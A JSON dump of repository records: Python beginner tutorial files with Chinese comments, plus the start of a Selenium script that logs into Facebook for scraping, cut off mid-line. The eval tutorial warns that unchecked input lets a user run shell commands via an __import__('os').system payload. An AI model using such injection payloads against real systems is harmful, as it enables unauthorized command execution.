ibbie_dic[k]))\n" }, { "alpha_fraction": 0.4600326120853424, "alphanum_fraction": 0.47634583711624146, "avg_line_length": 17.02941131591797, "blob_id": "1a4d2067ff45a51f73a8c92b0bb93854a220fdc9", "content_id": "155b684af3cf77cf8dc5bcd2006b10a7acf52f0c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 797, "license_type": "no_license", "max_line_length": 50, "num_lines": 34, "path": "/ibbie_21_for循环.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\nfor循环\n\n for temp in 容器:\n 某些操作\n else:\n 某些操作\n\n执行完循环体后,才会执行else的内容,如果循环中途使用break退出循环,则不会执行else的内容\n一般情况下不会加上else,常用于搜索操作,若搜索不到则执行else的内容\n\"\"\"\nt_list = [1, 2, 3]\nfor num in t_list:\n print(num)\n if num == 2:\n break\nelse:\n print(\"结束\")\n\nstudent_list = [{\"name\": \"小明\",\n \"age\": 20},\n {\"name\": \"小红\",\n \"age\": 21},\n {\"name\": \"小白\",\n \"age\": 22}]\n\nstu = \"ibbie\"\nfor stu_dic in student_list:\n if stu_dic[\"name\"]==stu:\n print(stu_dic)\n print(\"找到\"+stu+\"了\")\n break\nelse:\n print(\"找不到\"+stu)\n" }, { "alpha_fraction": 0.5711678862571716, "alphanum_fraction": 0.5894160866737366, "avg_line_length": 16.125, "blob_id": "fdeeac593cd779b12f11683f9b232f672b680f9c", "content_id": "ff111d1caf7ff00670d88aadfa987b15a1bed36b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1508, "license_type": "no_license", "max_line_length": 59, "num_lines": 64, "path": "/ibbie_27_init和del和str方法.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n__init__()\n 创建类的对象时,为对象分配完内存后,会自动执行初始化方法\n 可以在初始化方法中使用 self.变量=初始值 添加属性\n 如果不想写死属性的值,可以为init方法添加参数,把传递进来的参数赋给属性,创建对象时,要传递对应的参数\n\n__del__()\n 当对象被销毁前,会调用del方法\n 可以在del中\n\n__str__()\n 使用print打印对象时会调用的方法\n 默认是打印对象的内存地址\n 可以自定义打印对象输出的内容,str方法必须返回一个字符串\n\"\"\"\n\n\nclass Demo1:\n\n def __init__(self, name):\n print(\"我是init,创建对象时会被调用\")\n self.a = True\n self.b = 123\n self.name = name\n\n def __del__(self):\n print(\"我是del,Demo1对象临死前调用\")\n\n def __str__(self):\n return \"我是%s\" % self.name\n\n\nd2 = Demo1(\"蠢猪\")\nprint(d2.a)\nprint(d2.b)\nprint(d2.name)\nprint(d2)\n\n\nclass Person:\n def __init__(self,name,weight):\n self.name = name\n self.weight = weight\n\n def __del__(self):\n print(\"%s最后的体重是:%.2fkg\" % (self.name, self.weight))\n\n def __str__(self):\n return \"%s现在的体重是:%.2fkg\" % (self.name, self.weight)\n\n def eat(self):\n self.weight += 1\n\n def run(self):\n self.weight -= 0.5\n\n\nxiaoming = Person(\"小明\", 75.00)\nxiaoming.run()\nprint(xiaoming)\nxiaoming.eat()\nxiaoming.run()\nxiaoming.run()\nprint(xiaoming)\n" }, { "alpha_fraction": 0.5657015442848206, "alphanum_fraction": 0.5723830461502075, "avg_line_length": 18.478260040283203, "blob_id": "5ac81e44bb704a121eb5d80f3a06a6f4819758ba", "content_id": "1a2da9dc1c1432eccb825ea001651fe097a206c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 603, "license_type": "no_license", "max_line_length": 98, "num_lines": 23, "path": "/ibbie_31_父类的私有属性和方法.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n父类的私有属性和方法\n 虽然子类拥有父类的所有属性和方法,但是子类不能直接调用父类的私有属性和方法\n\"\"\"\n\n\nclass A:\n def __int__(self):\n self.__a = 123 # 私有属性\n\n def __test(self): # 私有方法\n print(\"我是A的私有方法\")\n\n\nclass B(A):\n def demo(self):\n print(\"我是B的demo()\")\n # print(self.a) # 若调用demo方法,AttributeError: 'B' object has no attribute 'a'\n # super().__test() # 若调用demo方法,AttributeError: 'super' object has no attribute '_B__test'\n\n\nb = B()\nb.demo()\n\n" }, { "alpha_fraction": 0.6185661554336548, "alphanum_fraction": 0.6360294222831726, "avg_line_length": 20.760000228881836, "blob_id": "8d556ed4dafd506575935d2c131f3fd0dc8c36dd", "content_id": "a58d4a7f57c7220bca999925a39fc4c2d2179f4e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1480, "license_type": "no_license", "max_line_length": 77, "num_lines": 50, "path": "/ibbie_17_元组.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n元组(tuple)\n 与列表类似,但是元组定义完成后,不能修改\n 用()定义\n 索引从0开始\n 通常存放不同类型的数据\n\n应用场景:\n 作为函数的参数或返回值,使得函数可以接收多个参数,或者返回多个返回值\n 格式化字符串\n 让列表不能被修改,保护数据安全\n\"\"\"\n\n\"\"\"元组的定义\"\"\"\nperson_tuple = (\"张三\", 20, 1.75)\n\nempty_tuple = () # 空元组\n\nsingle_tuple = (1) # 这不是一个元组\nprint(type(single_tuple)) # <class 'int'>\nsingle_tuple = (1,) # 只有一个元素的元组,元素后面要加上\",\"\nprint(type(single_tuple)) # <class 'tuple'>\n\n\"\"\"取值或取索引\"\"\"\nprint(person_tuple[0])\n# person_tuple[3] # IndexError: tuple index out of range\nprint(person_tuple.index(20))\n# print(person_tuple.index(21)) # ValueError: tuple.index(x): x not in tuple\n\n\"\"\"元组的长度\"\"\"\nprint(len(person_tuple))\n\n\"\"\"元组中指定内容的个数\"\"\"\nprint(person_tuple.count(1.75))\n\n\"\"\"遍历元组\"\"\"\nfor temp in person_tuple:\n print(\"%s : %s\" % (type(temp), temp))\n\n\"\"\"格式化字符串\"\"\"\nprint(\"%s 的年龄是 %d ,身高 %.2f m\" % person_tuple)\nperson_str = \"%s 的年龄是 %d ,身高 %.2f m\" % person_tuple\nprint(person_str)\n\n\"\"\"list和tuple之间的转换\"\"\"\nperson_list = list(person_tuple) # 元组==>列表\nprint(type(person_list)) # <class 'list'>\n\ntemp_tuple = tuple(person_list) # 列表==>元组\nprint(type(temp_tuple)) # <class 'tuple'>\n" }, { "alpha_fraction": 0.5515970587730408, "alphanum_fraction": 0.5945945978164673, "avg_line_length": 14.339622497558594, "blob_id": "01cbad4e39f732d394e2c2e493c1e57ecd8a79ae", "content_id": "540503f2753eddcc6c61d999e95fd2534f59bfba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1154, "license_type": "no_license", "max_line_length": 61, "num_lines": 53, "path": "/ibbie_26_面向对象.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n面向对象\n dir()可以查看python针对该对象提供的内置的方法或属性\n\n定义类的格式:\n class 类名:\n def 方法名1(self, 参数列表):\n pass\n def 方法名2(self, 参数列表):\n pass\n\n创建类的对象\n 变量名 = 类名()\n 不修改类,可以使用 变量名.属性 为对象增加属性(不推荐)\n\n关于类的定义:\n 使用class关键字\n 定义方法的第一个参数必须是self\n\n关于self\n 表示对象本身,可以使用self在类中调用属性或方法,包括使用 变量名.属性 增加的属性,也可以使用self调用\n\"\"\"\n\n\ndef demo():\n \"\"\"我是demo\"\"\"\n print(\"我是demo\")\n\n\nprint(dir(demo))\nprint(demo.__doc__)\nprint(dir(\"abc\"))\nprint(dir(2))\nprint(dir(True))\n\n\nclass DemoClass:\n \"\"\"定义一个类\"\"\"\n def method1(self, num):\n print(\"method1\")\n\n def method2(self, a, b, c):\n print(\"method2\")\n\n\n\"\"\"创建类的对象\"\"\"\nd = DemoClass()\nd.method1(1)\nd.method2(1, 2, 3)\nprint(d) # <__main__.DemoClass object at 0x00000219B4288FD0>\nprint(\"%x\" % id(d)) # 219b4288fd0\nd.name = \"hahah\"\nprint(d.name)\n\n" }, { "alpha_fraction": 0.7006369233131409, "alphanum_fraction": 0.7006369233131409, "avg_line_length": 16.44444465637207, "blob_id": "f7e6831bed21c74acf494b0e9fe1a1fb0b757d6f", "content_id": "f14793bdeb8bc4dc9bf7f94609ba24cb5abefda1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 285, "license_type": "no_license", "max_line_length": 73, "num_lines": 9, "path": "/ibbie_49_eval函数.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\neval函数\n 可以将传入的字符串当成有效的表达式进行计算\n\n注意:不要让eval直接接收input的内容,否则用户可以利用__import__('os').system('xxx命令')的方式,执行终端命令\n\"\"\"\n\nstr = input(\"请输入表达式:\")\nprint(eval(str))\n" }, { "alpha_fraction": 0.7007299065589905, "alphanum_fraction": 0.7007299065589905, "avg_line_length": 14.333333015441895, "blob_id": "21688a73237a29fd30487e9572c6566577df56f5", "content_id": "4be8ce7af2ea3919620bc05a6f86da8a23e4296f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 223, "license_type": "no_license", "max_line_length": 34, "num_lines": 9, "path": "/ibbie_43_package/__init__.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\npackage\n 多个相关联的模块可以放进一个package中\n 每个python包下都有一个特殊的文件__init__.py\n __init__.py文件中指定该包要对外提供的模块\n\"\"\"\n\n\nfrom . import test_package" }, { "alpha_fraction": 0.5669934749603271, "alphanum_fraction": 0.5669934749603271, "avg_line_length": 12.30434799194336, "blob_id": "7022242d30b0180063d88c31e11e6415d7279a38", "content_id": "2dc130e02c1682365904bdd977806437a734ba6e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 800, "license_type": "no_license", "max_line_length": 32, "num_lines": 46, "path": "/ibbie_29_继承.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n继承\n 子类继承父类所有的方法和属性\n 继承的格式:\n class 类名(父类名):\n pass\n\n 可以多重继承,C继承B,B继承A,C也具有A的属性和方法\n\"\"\"\n\n\nclass Animal:\n\n def eat(self):\n print(\"吃东西\")\n\n def sleep(self):\n print(\"睡觉\")\n\n\nclass Dog(Animal):\n\n def bark(self):\n print(\"汪汪汪\")\n\n\nclass Cat(Animal):\n def catch(self):\n print(\"抓老鼠\")\n\n\nclass HelloKitty(Cat):\n def cute(self):\n print(\"可可爱爱\")\n\n\ndog = Dog()\ndog.eat() # Animal类的方法\ndog.sleep() # Animal类的方法\ndog.bark() # Dog自己的方法\n\nhk = HelloKitty()\nhk.eat() # Animal类的方法\nhk.cute() # Animal类的方法\nhk.catch() # Cat类的方法\nhk.sleep() # HelloKitty自己的方法\n" }, { "alpha_fraction": 0.6066482067108154, "alphanum_fraction": 0.6121883392333984, "avg_line_length": 10.645161628723145, "blob_id": "f8750bd90cb189447c35494a684b485c5f74484c", "content_id": "fc083141a5bc1c8d88ded0157eb5c79d426e835b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 623, "license_type": "no_license", "max_line_length": 38, "num_lines": 31, "path": "/ibbie_01_注释.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "# 我是注释,建议“#”后面加一个空格\nprint(\"我是程序\")\n\nprint(\"啦啦啦\") # 在代码后注释,建议代码与“#”之间有两个空格\n\n\"\"\"\n多行注释\n多行注释\n多行注释\n\"\"\"\nprint(\"hhh\")\n\n\n# 快捷键shift+alt+F调整代码格式\n\n\n# 文档注释\ndef function(a, b):\n \"\"\"\n 此处是函数的文档注释\n 在调用处使用快捷键ctrl+Q可以查看函数的文档注释\n\n :param a:我是a参数的文档注释\n :param b:我是b参数的文档注释\n :return 我是返回值的文档注释\n \"\"\"\n print(\"执行函数function\")\n return a + b\n\n\nfunction(1, 1)\n" }, { "alpha_fraction": 0.6013104915618896, "alphanum_fraction": 0.616431474685669, "avg_line_length": 18.076923370361328, "blob_id": "3e3d115d78765595a1c1686ecab4138aebb79307", "content_id": "0ebe61316277a65ecb1b050e9193b1c58ca42371", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2960, "license_type": "no_license", "max_line_length": 91, "num_lines": 104, "path": "/ibbie_47_文件操作.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n文件操作\n 打开 open(文件名,打开方式)\n 默认以只读形式打开文件\n f 只读,默认值\n w 只写,若文件存在,覆盖原文件,若文件不存在,自动创建\n a 追加\n r+ 读写,若文件不存在,抛出异常\n w+ 读写,若文件存在,覆盖原文件,若文件不存在,自动创建\n a+ 读写,若文件存在,在文件指针指向末尾追加,若不存在,自动创建\n 注意:频繁移动文件指针会影响文件读写效率,所以一般使用无+号的三个参数\n 读 read()\n 分行读 readline()\n 写 write()\n 关闭 close()\n\n文件指针\n 在使用open()打开文件后,文件指针指向文件开头\n 使用read()后,文件指针指向文件结尾,默认读取文件所有内容\n 再次调用read(),就没有任何数据可以获取了\n\nimport os 文件/文件夹操作的包\n \n\"\"\"\nimport os # 文件/文件夹操作的包\n\n\"\"\"打开文件\"\"\"\nfile = open(\"readme.txt\") # 会在当前目录下寻找\n\n\"\"\"读取文件\"\"\"\ntext = file.read()\nprint(text)\nprint(\"*\" * 34)\ntext2 = file.read()\nprint(text2) # 没有内容输出\n# file.write(\"try to write\") # 文件是以只读的形式打开的,不能进行写的操作:io.UnsupportedOperation: not writable\n\n\"\"\"关闭文件\"\"\"\nfile.close()\n\n\"\"\"以追加方式写入文件\"\"\"\nfile = open(\"readme.txt\", \"a\")\nfile.write(\"phone:10086\")\nfile.close()\n\n\"\"\"分行读取\"\"\"\nfile = open(\"readme.txt\")\n\nwhile True:\n text3 = file.readline()\n if not text3:\n break\n print(text3)\nfile.close()\n\n\"\"\"小文件的复制,可以一次读取,一次写入\"\"\"\n# file1 = open(\"readme.txt\")\n# file2 = open(\"readme[copy].txt\",\"w\") # 只写,文件不存在会自动创建,创建在当前文件夹下\n#\n# text = file1.read()\n# file2.write(text)\n#\n# file1.close()\n# file2.close()\n\n\"\"\"大文件的复制,分行读写\"\"\"\n# file1 = open(\"readme.txt\")\n# file2 = open(\"readme[copy].txt\",\"w\") # 只写,文件不存在会自动创建,创建在当前文件夹下\n#\n# while True:\n# text = file1.readline()\n# if not text:\n# break\n# file2.write(text)\n#\n# file1.close()\n# file2.close()\n\n\"\"\"\n文件/文件夹的相关操作\n要导入os包\n\"\"\"\n\n\"\"\"重命名文件\"\"\"\n# os.rename(\"readme[copy].txt\",\"README[COPY].txt\")\n\n\"\"\"删除文件\"\"\"\n# os.remove(\"README[COPY].txt\")\n\n\"\"\"查看目录下的内容\"\"\"\n# dir_list = os.listdir(\".\")\n# print(dir_list)\n\n\"\"\"判断是否是文件夹\"\"\"\n# print(os.path.isdir(\"ibbie_45_发布模块\")) # True\n# print(os.path.isdir(\"HelloPython.py\")) # False\n\n\"\"\"创建与删除目录\"\"\"\n# os.mkdir(\"test\") # 若文件夹已存在:FileExistsError: [WinError 183] 当文件已存在时,无法创建该文件。: 'test'\n# os.rmdir(\"test\") # 若文件夹不存在:FileNotFoundError: [WinError 2] 系统找不到指定的文件。: 'test'\n\n\"\"\"获取当前目录\"\"\"\ndir_curr = os.getcwd()\nprint(dir_curr)\n" }, { "alpha_fraction": 0.41025641560554504, "alphanum_fraction": 0.5641025900840759, "avg_line_length": 19, "blob_id": "c371c8acbbfa638b290ed5ce84f2e7de52b8c71f", "content_id": "7ba17cd539f74f3c8e6d850e63bb10429781874f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 39, "license_type": "no_license", "max_line_length": 23, "num_lines": 2, "path": "/ibbie_43_package/test_package2.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "def test43_2():\n print(\"test43_2()\")" }, { "alpha_fraction": 0.645760715007782, "alphanum_fraction": 0.6620209217071533, "avg_line_length": 28.724138259887695, "blob_id": "0262246a769f5fd66923529ae206573a3e045142", "content_id": "332cbcff3d8f90031722ad8f92534c3f0b4d77a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1299, "license_type": "no_license", "max_line_length": 68, "num_lines": 29, "path": "/ibbie_45_发布模块/setup.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "from distutils.core import setup\n\"\"\"\n一个发布模块的程序(linux系统)\n 需要在终端执行,并加上build命令,构建模块,会生成build文件夹,里面有打包的模块\n 若发布的模块是针对py2.x,使用python2的解释器(python setup.py build)\n 若发布的模块是针对py3.X,使用python3的解释器(python3 setup.py build)\n 然后再执行 python3 setup.py sdist,生成dist文件夹,里面有tar.gz文件,打包完成\n\"\"\"\nsetup(name=\"test_package_module\", # 包名\n version=\"1.0\", # 版本号\n description=\"just test for package module\", # 描述信息\n long_description=\"测试打包模块\", # 完整描述信息\n author=\"ibbie.yan\", # 作者\n author_email=\"[email protected]\", # 作者邮箱\n url=\"www.ibbie.com\", # 作者网址\n py_modules=[\"ibbie_43_package.test_package\", # 要打包的模块,放进list中\n \"ibbie_43_package.test_package2\"])\n\n\"\"\"\n安装模块(linux系统)\n 解压压缩包:tar -zxvf 发布的那个tar.gz文件\n 安装压缩包:sudo python3 setup.py install\n\"\"\"\n\n\"\"\"\n卸载模块(linux系统)\n 每个模块都有一个内置属性__file__,可以查看文件的位置\n 进入文件夹删除模块相关的文件即可\n\"\"\"" }, { "alpha_fraction": 0.5571733117103577, "alphanum_fraction": 0.6157670617103577, "avg_line_length": 23.92035484313965, "blob_id": "5eddcec5b87e61fbd22e0488898f5e200ba1eeec", "content_id": "b172806bc2335a4e152129b255c6357b345c947b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4234, "license_type": "no_license", "max_line_length": 88, "num_lines": 113, "path": "/ibbie_19_字符串.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n字符串\n 可以用双引号或单引号定义字符串,一般使用双引号\n str = \"abc\"\n 假如字符串中包含双引号,则使用单引号来定义\n str = 'lalala\"啦啦啦\"'\n 可以帮字符串看成是一个列表,列表的每个元素都是一个字符\n 字符串的索引值从0开始\n\"\"\"\n\n\"\"\"定义字符串\"\"\"\nstr1 = \"abc\"\nprint(str1)\nstr2 = '\"哈哈\"'\nprint(str2)\n\n\"\"\"遍历字符串\"\"\"\nstr3 = \"abc123321cba\"\nfor char in str3:\n print(char)\n\n\"\"\"字符串的长度\"\"\"\nprint(len(str3))\n\n\"\"\"统计子字符串在字符串中出现的次数\"\"\"\nprint(str3.count(\"a\"))\nprint(str3.count(\"z\")) # 没有则返回0\n\n\"\"\"从字符串中查找,并返回索引值\"\"\"\nidx = str3.index(\"123\")\nprint(idx) # 返回的是查找的字符串的第一个字符在字符串中的索引\n# idx2 = str3.index(\"1234\") # 若查找的小字符串不存在,报错:ValueError: substring not found\n\n\"\"\"***********字符串常用方法***********\"\"\"\n\n\"\"\"是否只有空白字符\"\"\"\nempty_str = \"\"\nspace_str = \" \"\nprint(empty_str.isspace()) # False\nprint(space_str.isspace()) # True\n\n\"\"\"是否只包含数字\"\"\"\nnum_str = \"一百一十一\"\nprint(num_str.isdecimal()) # 12.3(×) 123(√) ①(×) 一百一十一(×)\nprint(num_str.isdigit()) # 12.3(×) 123(√) ①(√) 一百一十一(×)\nprint(num_str.isnumeric()) # 12.3(×) 123(√) ①(√) 一百一十一(√)\n\n\"\"\"查找与替换\"\"\"\nhello_str = \"hello world\"\nprint(hello_str.startswith(\"HELLO\")) # False 是否以某字符串开头\nprint(hello_str.endswith(\"world\")) # True 是否以某字符串结尾\n\nprint(hello_str.find(\"llo\")) # 2 查找字符串,返回索引值\nprint(hello_str.find(\"abc\")) # -1 与index不同,找不到也不会报错,会返回-1\n\nprint(hello_str.replace(\"world\", \"python\")) # hello python 替换指定内容,返回替换后的新字符串\nprint(hello_str) # hello world 但是旧字符串不会被改动\n\n\"\"\"文本对齐\"\"\"\npoem = [\"题目\",\n \"作者\",\n \"我是第一行诗\",\n \"我是第二行诗\",\n \"我是第三行诗\",\n \"我是第四行诗\", ]\nfor poem_str in poem:\n print(\"|%s|\" % poem_str.center(10, \"🍔\")) # 居中\n # print(\"|%s|\" % poem_str.center(10,\"**\"))\n # 填充的字符只能是一个字符,否则报错:TypeError: The fill character must be exactly one character long\n\nfor poem_str in poem:\n print(\"|%s|\" % poem_str.ljust(10, \"🍟\")) # 左对齐\n\nfor poem_str in poem:\n print(\"|%s|\" % poem_str.rjust(10, \"🍖\")) # 右对齐\n\n\"\"\"去除空白字符\"\"\"\nspace_str = \" ab| |cdef \"\nprint(space_str.lstrip()) # 去除左边的空白字符\nprint(space_str.rstrip()) # 去除右边的空白字符\nprint(space_str.strip()) # 去除两边的空白字符\n\n\"\"\"拆分和连接\"\"\"\nsplit_str = \"abc*efg*jjj* kkk*ooo\"\nsp1 = split_str.split()\nsp2 = split_str.split(\"*\")\nprint(sp1) # 分割字符,默认以空白字符分割,返回一个list\nprint(sp1) # 分割字符,按指定字符分割,返回一个list2\n\nprint(\"🚗\".join(sp2)) # 连接字符串,用指定字符连接\n\n\"\"\"\n截取字符串\n 字符串有两种索引的方式\n 正序 从第一个字符开始往后:0,1,2,3...\n 倒序 从最后一个字符开始往前:-1,-2,-3...\n 语法:\n string[开始索引:结束索引:步长]\n 开始索引的字符包含在要截取的字符串中\n 结束索引的字符不包含在要截取的字符串中\n 步长为整数,从左往右走,步长为负数,从右往左走\n\"\"\"\nstr4 = \"012345678\"\nprint(str4[2:5]) # 234 截取索引2到4的字符\nprint(str4[3:]) # 345678 截取索引3到末尾\nprint(str4[:6]) # 012345 截取开头到索引5\nprint(str4[::2]) # 02468 从头到尾,每隔一个取一个字符\nprint(str4[1::2]) # 1357 从索引1开始,每隔一个取一个字符\nprint(str4[2:-1]) # 234567 从索引2开始,取到倒数第二个字符\nprint(str4[-2]) # 7 取倒数第二的字符\nprint(str4[-2:]) # 78 取最后两个字符\nprint(str4[-1::-1]) # 876543210 逆序,从最后一个字符开始,步长-1,即每取一个字符向前移动一格\nprint(str4[::-1]) # 876543210 逆序,步长-1,即每取一个字符向前移动一格\n" }, { "alpha_fraction": 0.6423926949501038, "alphanum_fraction": 0.6586475968360901, "avg_line_length": 17.987653732299805, "blob_id": "c593de4528944eecdd6c30ddeb1d1ccc27517dec", "content_id": "14dec125aeab20e07b96cd3bf0f3d105609fe33b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2048, "license_type": "no_license", "max_line_length": 60, "num_lines": 81, "path": "/ibbie_16_列表.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n列表(list,相当于java中的数组)\n 格式:变量名=[\"hhh\",\"xxx\",\"jjj\",\"aaa\"]\n 索引值从0开始\n 可以存放不同类型的数据,但是通常存放类型相同的数据\n\"\"\"\n\"\"\"创建列表\"\"\"\nname_list = [\"hhh\", \"jjj\", \"jjj\", \"aaa\"]\nprint(name_list)\n\n\"\"\"根据索引取值\"\"\"\nname_list[2]\n# name_list[4] # IndexError: list index out of range\nprint(name_list[2])\n\n\"\"\"根据内容取索引\"\"\"\nname_list.index(\"aaa\")\n# name_list.index(\"111\") # ValueError: '111' is not in list\nprint(name_list.index(\"aaa\"))\n\n\"\"\"修改列表的值\"\"\"\nname_list[0] = \"ibbie\"\nprint(name_list)\n\n\"\"\"在末尾添加一个元素\"\"\"\nname_list.append(\"yan\")\nprint(name_list)\n\n\"\"\"在末尾添加一组元素\"\"\"\ntemp_list = [\"1\",\"2\",\"3\"]\nname_list.extend(temp_list)\nprint(name_list)\n\n\"\"\"在指定索引位置插入元素\"\"\"\nname_list.insert(3, \"doge\")\nprint(name_list)\n\n\"\"\"从列表中删除指定的内容\"\"\"\nname_list.remove(\"jjj\") # 如果要删除的内容有多个,只删除最前面的一个\nprint(name_list)\n\n\"\"\"pop方法删除元素,pop能返回被删除的元素\"\"\"\ntemp = name_list.pop() # 不传递参数,默认删除最后一个元素,返回被删除元素\nprint(temp)\nprint(name_list)\n\ntemp = name_list.pop(1) # # 传递参数,删除指定索引的元素,返回被删除元素\nprint(temp)\nprint(name_list)\n\n\"\"\"清空列表\"\"\"\nname_list.clear()\nprint(name_list)\n\n\"\"\"列表的长度\"\"\"\nname_list = [\"hhh\", \"jjj\", \"jjj\", \"aaa\"]\nnumber_list = [7, 2, 2, 2, 10, 6]\nprint(len(number_list))\n\n\"\"\"列表中指定内容的个数\"\"\"\nprint(\"列表中元素2出现了 %d 次\" % number_list.count(2))\n\n\"\"\"对列表进行排序\"\"\"\nname_list.sort() # 升序排序\nnumber_list.sort()\nprint(name_list)\nprint(number_list)\n\nname_list.sort(reverse=True) # 降序排序,指定reverse为True\nnumber_list.sort(reverse=True)\nprint(name_list)\nprint(number_list)\n\nname_list.reverse() # 反转列表\nnumber_list.reverse()\nprint(name_list)\nprint(number_list)\n\n\"\"\"迭代列表的元素\"\"\"\nfor name in name_list:\n print(\"我叫 %s\" % name)\n" }, { "alpha_fraction": 0.5111111402511597, "alphanum_fraction": 0.5377777814865112, "avg_line_length": 12.29411792755127, "blob_id": "0a7a0863aff02fc7eeff398a417e2222a7b015c3", "content_id": "c4ca267fb79cb24e8d79ba3493c16b7a03858d02", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 319, "license_type": "no_license", "max_line_length": 47, "num_lines": 17, "path": "/ibbie_25_递归函数.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n递归函数\n 自己调用自己\n 要有出口条件\n\"\"\"\n\n\ndef sum_num(num):\n \"\"\"计算从1到num所有整数的和\"\"\"\n if num == 1: # 出口条件,没有出口条件会死循环\n return 1\n else:\n return num + sum_num(num - 1) # 自己调用自己\n\n\ntotal = sum_num(20)\nprint(total)" }, { "alpha_fraction": 0.603543758392334, "alphanum_fraction": 0.603543758392334, "avg_line_length": 19.522727966308594, "blob_id": "3bce84e369acfa69bb99ffc06dfeea2cc6abf5d4", "content_id": "94be5008c28161692147024379c85fab30c88b71", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1249, "license_type": "no_license", "max_line_length": 96, "num_lines": 44, "path": "/ibbie_33_多继承.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n多继承\n 一个类继承多个父类,该类拥有所有父类的属性和方法\n 如果多个父类中有同名方法,会调用继承类列表中,先定义的那个类的方法(要尽量避免这种情况)\n 也要尽量避免使用多继承\n\"\"\"\n\n\nclass A:\n def __init__(self):\n self.a = \"A类的属性\"\n\n def method_a(self):\n print(\"A类的方法\")\n\n def same_name_method(self):\n print(\"A类的same_name_method()\")\n\nclass B:\n def __init__(self):\n self.b = \"B类的属性\"\n\n def method_b(self):\n print(\"B类的方法\")\n\n def same_name_method(self):\n print(\"B类的same_name_method()\")\n\n# class C(B, A):\nclass C(A, B):\n \"\"\"C类继承A类和B类,用逗号分隔\"\"\"\n pass\n\n\nc = C()\nc.method_a()\nc.method_b()\n# print(c.a) # 如果C类的定义是:class C(B, A): 此处会error,AttributeError: 'C' object has no attribute 'a'\n# print(c.b) # 如果C类的定义是:class C(A, B): 此处会error,AttributeError: 'C' object has no attribute 'b'\n\n\"\"\"两个父类都有的方法\"\"\"\n# 如果C类的定义是:class C(B, A): 输出:B类的same_name_method()\n# 如果C类的定义是:class C(A, B): 输出:A类的same_name_method()\nc.same_name_method()\n" } ]
50
ViphouS/fb_webscraping
https://github.com/ViphouS/fb_webscraping
65be7b554e16af52b2575bf108a3ee33566be190
b14be2fb68c675b552330b6789dd656d4d234a6d
ccc75d290a14d36b0f5e881cbde0c11a45ecbfe4
refs/heads/main
2022-12-23T17:15:56.025895
2020-10-02T01:42:37
2020-10-02T01:42:37
300,471,506
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.752136766910553, "alphanum_fraction": 0.8205128312110901, "avg_line_length": 22.399999618530273, "blob_id": "3ff27aac2be1ad32dd8588c7642f10ce5c93cced", "content_id": "f69242705e11f7064577fc33569b9de043c52bda", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 117, "license_type": "no_license", "max_line_length": 46, "num_lines": 5, "path": "/README.md", "repo_name": "ViphouS/fb_webscraping", "src_encoding": "UTF-8", "text": "# fb_webscraping\nget html data from facebook by python selenium\npersonal projects\nlearn from youtube\ndate 28/09/2020\n" }, { "alpha_fraction": 0.6954413056373596, "alphanum_fraction": 0.7235693335533142, "avg_line_length": 23.14634132385254, "blob_id": "aa40a60403e973e08063f2a5d785111806c23115", "content_id": "bab858c8046d37f55282f810a1882c635a63dc63", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1031, "license_type": "no_license", "max_line_length": 137, "num_lines": 41, "path": "/fb_bot.py", "repo_name": "ViphouS/fb_webscraping", "src_encoding": "UTF-8", "text": "from bs4 import BeautifulSoup\r\n\r\nfrom selenium import webdriver\r\nfrom getpass import getpass\r\nfrom login_info import username, password \r\nfrom time import sleep\r\n\r\nusr = username\r\npwd = password\r\n\r\ninput (\"link 1\")\r\n\r\nopions = webdriver.ChromeOptions()\r\nopions.add_argument('--disable-notifications')\r\ndriver = webdriver.Chrome(options=opions)\r\n\r\ndriver.get('https://www.facebook.com')\r\n\r\nusername_box = driver.find_element_by_id('email')\r\nusername_box.send_keys(username)\r\n\r\npassword_box = 